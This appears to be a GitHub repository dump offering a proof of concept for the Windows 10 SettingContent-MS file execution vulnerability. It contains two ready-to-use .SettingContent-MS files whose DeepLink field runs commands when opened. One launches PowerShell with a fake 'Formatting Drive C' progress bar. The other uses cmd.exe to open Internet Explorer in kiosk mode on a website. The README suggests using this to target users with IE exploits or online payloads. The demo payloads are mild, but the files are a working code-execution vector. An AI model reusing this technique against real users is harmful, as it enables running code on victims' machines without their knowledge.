├── LoadPowershellDemo.SettingContent-MS ├── README.md └── TestWebsite.SettingContent-MS-File /LoadPowershellDemo.SettingContent-MS: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel 6 | "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" -c 7 | For ($i=0; $i -le 100; $i++) {Start-Sleep -Milliseconds 20 8 | Write-Progress -id 1 -Activity 'Formatting Drive C' -Status 'Current Count: $i' -PercentComplete $i -CurrentOperation 'Formatting ...'} 9 | %windir%\system32\control.exe 10 | 11 | 12 | 13 | {12B1697E-D3A0-4DBC-B568-CCF64A3F934D} 14 | 15 | 16 | @shell32.dll,-4161 17 | @shell32.dll,-4161 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SettingContent-MS-File-Execution 2 | SettingContent-MS File Execution vulnerability in Windows 10
3 | Proof of concept for SettingContent-MS File Execution Vulnerability in Windows 10
4 | Download and execute LoadWebsite.SettingContent-MS
5 | Website will automatically load Internet Explorer, load a specific site and maximize the screen. 6 | This can be used to leverage existing vulnerabilities in Internet Explorer or target via an online payload
7 | Vulnerability first discovered by Matt Nelson
8 | Documented: https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 9 | 10 | Created by: Brad Voris
11 | 12 | 13 | 14 | 15 | ## Connect with me at 16 | Victim Of Technology 17 |

18 | GitHubGitHub commit activityGitHub All ReleasesGitHub repo sizeGitHub language countGitHub issuesGitHub top language 19 | -------------------------------------------------------------------------------- /TestWebsite.SettingContent-MS-File: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel 6 | %windir%\system32\cmd.exe /c "C:\Program Files\Internet Explorer\iexplore.exe" -k https://www.victimoftechnology.com 7 | %windir%\system32\control.exe 8 | 9 | 10 | 11 | {12B1697E-D3A0-4DBC-B568-CCF64A3F934D} 12 | 13 | 14 | @shell32.dll,-4161 15 | @shell32.dll,-4161 16 | 17 | 18 | 19 | --------------------------------------------------------------------------------